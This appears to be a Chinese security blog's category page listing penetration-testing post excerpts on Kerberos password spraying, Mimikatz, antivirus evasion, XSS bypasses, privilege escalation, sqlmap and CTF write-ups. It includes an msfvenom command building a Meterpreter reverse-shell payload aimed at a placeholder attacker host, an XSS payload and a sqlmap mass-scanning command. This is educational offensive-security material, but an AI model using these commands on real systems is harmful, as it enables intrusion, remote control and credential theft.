随笔分类 -  渗透测试

摘要:域内用户名枚举和密码喷洒 于Kerberos本身是一种基于身份认证的协议,所以也可对进行暴力破解或用户名枚举,并且不需要域用户下,只要攻击者所控的机器可以与域控的KDC正常通信即可(可以ping通) 实验 我这里实验主要是域控administrator、域成员af、还有一台非域机。 nmap -p 阅读全文
posted @ 2021-08-27 08:43 tomyyyyy 阅读(1431) 评论(0) 推荐(1)
摘要:mimikazi教程 1、简介 1.1、背景介绍 Mimikatz 是从 Windows 系统中收集凭证数据最好的工具之一。由于 Mimikatz 的作者 Benjamin Delpy 是法国人,所以描述关于 Mimikatz 用法的资源都是法语的,至少在他的博客中是这样的。 Mimikatz 的 阅读全文
posted @ 2021-08-24 20:20 tomyyyyy 阅读(1743) 评论(0) 推荐(0)
摘要:msfvenom——木马免杀篇 c语言执行 生成shellcode.c msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c > shellcode.c 然 阅读全文
posted @ 2021-08-24 09:40 tomyyyyy 阅读(2595) 评论(0) 推荐(0)
摘要:伪造mysql服务端 原理概述 MySQL客户端和服务端通信过程中是通过对话的形式来实现的,客户端发送一个操作请求,然后服务端根据客服端发送的请求来响应客户端,在这个过程中客户端如果一个操作需要两步才能完成那么当它发送完第一个请求过后并不会存储这个请求,而是直接就丢掉了,所以第二步就是根据服务端的响 阅读全文
posted @ 2021-08-23 16:25 tomyyyyy 阅读(286) 评论(0) 推荐(0)
摘要:XSS绕过常见方式 转载自https://www.cnblogs.com/bingtang123/p/12844659.html XSS常见方式 1.<script>alert(1)</script> 2.源码第一个,[<]被转义,因此在第二个里 "><script>alert(1)</script 阅读全文
posted @ 2021-08-12 19:58 tomyyyyy 阅读(811) 评论(0) 推荐(2)
摘要:信息收集的意义 信息收集对于渗透测试前期来说是非常重要的。正所谓,知己知彼百战不殆,信息收集是渗透测试成功的保障,只有我们掌握了目标网站或目标主机足够多的信息之后,才能更好地进行渗透测试。 信息收集的方式可以分为两种:主动和被动。 主动信息收集 通过直接访问网站,在网站上进行操作,对网站进行扫描等。 阅读全文
posted @ 2021-04-25 22:56 tomyyyyy 阅读(733) 评论(0) 推荐(0)
摘要:红队中易被攻击的一些重点系统漏洞整理 转载自https://blog.csdn.net/qq_34236803/article/details/112862018 一、OA系统 泛微(Weaver-Ecology-OA) 🔸 泛微OA E-cology RCE(CNVD-2019-32204) - 阅读全文
posted @ 2021-04-25 20:30 tomyyyyy 阅读(759) 评论(0) 推荐(0)
摘要:内网渗透——PSExec工具 简介 PsExec 是由 Mark Russinovich 创建的 Sysinternals Suite中包含的工具。最初,它旨在作为系统管理员的便利工具,以便他们可以通过在远程主机上运行命令来执行维护任务。后来因为太过方便,被利用到内网渗透之中。现在PsExec类的工 阅读全文
posted @ 2021-04-16 15:35 tomyyyyy 阅读(6254) 评论(0) 推荐(0)
摘要:windows 系统相关 #查看系统信息 systeminfo /all #查看系统架构 echo %PROCESSOR_ARCHITECTURE% #机器名 hostname #查看操作系统版本 ver systeminfo | findstr /B /C:"OS Name" /C:"OS Ver 阅读全文
posted @ 2021-04-15 18:15 tomyyyyy 阅读(227) 评论(0) 推荐(0)
摘要:linux提权——suid提权 基础知识 suid权限介绍: SUID (Set owner User ID up on execution) 是给予文件的一个特殊类型的文件权限。在 Linux/Unix中,当一个程序运行的时候, 程序将从登录用户处继承权限。SUID被定义为给予一个用户临时的(程序 阅读全文
posted @ 2021-04-14 18:05 tomyyyyy 阅读(829) 评论(0) 推荐(1)
摘要:通过修改/etc/passwd提升权限 基础知识 /etc/passwd: 文件中的详细信息格式 用户名:代表用户账号的字符串。通常长度不超过8个字符,并且由大小写字母和/或数字组成。登录名中不能有冒号(:),因为冒号在这里是分隔符。为了兼容起见,登录名中最好不要包含点字符(.),并且不使用连字符( 阅读全文
posted @ 2021-04-14 17:06 tomyyyyy 阅读(1832) 评论(0) 推荐(1)
摘要:JD-FreeFuck 后台命令执行漏洞 漏洞说明 JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器 项目地址:https://github.com/meselson/JD-FreeFuck 环境搭建 脚本一键部署: bash <(cu 阅读全文
posted @ 2021-04-14 11:15 tomyyyyy 阅读(1807) 评论(1) 推荐(0)
摘要:简介 sqlmap 是一款自动化检测与利用 SQL 注入漏洞的免费开源工具。 目前可以检测用来于检测利用五种不同类型的 SQL 注入 布尔型盲注(Boolean-based blind):sqlmap 会替换或添加 SQL 语句到 HTTP 请求的查询参数里面,相关的 SQL 语句可能是合法的 SE 阅读全文
posted @ 2021-04-13 16:32 tomyyyyy 阅读(1138) 评论(0) 推荐(0)
摘要:Sqmap 利用 Google 批量扫描注入点 sqlmap -g "inurl:php?id=10 site:.com.cn" --proxy "http://127.0.0.1:1080" --threads 5 --batch --answer "extending=N,follow=N,ke 阅读全文
posted @ 2021-04-13 15:50 tomyyyyy 阅读(1532) 评论(0) 推荐(0)
摘要:sqlmap --tamper 绕过WAF脚本分类整理 但很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。 sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。 当然使用脚本之前需要确定的就是系统过滤了哪些关键 阅读全文
posted @ 2020-12-26 15:18 tomyyyyy 阅读(3401) 评论(0) 推荐(1)
摘要:LD_PRELOAD绕过disabled_functions限制 思路分析 根据资料可得知有四种绕过 disable_functions 的手法: 攻击后端组件,寻找存在命令注入的 web 应用常用的后端组件,如,ImageMagick 的魔图漏洞、bash 的破壳漏洞等等 寻找未禁用的漏网函数,常 阅读全文
posted @ 2020-12-16 13:55 tomyyyyy 阅读(330) 评论(0) 推荐(0)
摘要:渗透测试——搜索引擎 Google 介绍 谷歌作为最大的搜索引擎,利用其强大的搜索能力可以方便快捷的找到我们需要的信息,例如:子域名、后台管理地址、敏感信息、以及可能存在漏洞的网页 通配符 通配符 语义 说明 示例 + 包含关键词 +前面必须有一个空格 admin +login - 排除关键词 -前 阅读全文
posted @ 2020-11-02 12:08 tomyyyyy 阅读(1431) 评论(0) 推荐(0)
摘要:域渗透基本概念 0x01 什么是内网? 内网就是局域网(LAN),比如内网中的机器,输入ipconfig /all发现我们的ip是192.168..,内网中一号机器是192.168.0.1,二号机器是192.168.0.2,以此类推,但是我们在浏览器中输入 ip.cn 发现都是同一个ip。 0x02 阅读全文
posted @ 2020-11-01 16:16 tomyyyyy 阅读(1159) 评论(0) 推荐(0)
摘要:CTF中WEB题——RCE 相关函数 命令执行 system() #string system ( string $command [, int &$return_var ] ) #system()函数执行有回显,将执行结果输出到页面上 <?php system("whoami"); ?> exec 阅读全文
posted @ 2020-10-31 10:23 tomyyyyy 阅读(2637) 评论(0) 推荐(0)
摘要:攻防世界WEB 1.baby_web 根据提示猜测index.php页面,页面会进行重定向 bp抓包,查看响应头信息,发现flag。 flag{very_baby_web} 2.Training-WWW-Robots 根据题目信息,查看robots.txt,发现fl0g.php cyberpeace 阅读全文
posted @ 2020-10-28 11:24 tomyyyyy 阅读(912) 评论(0) 推荐(0)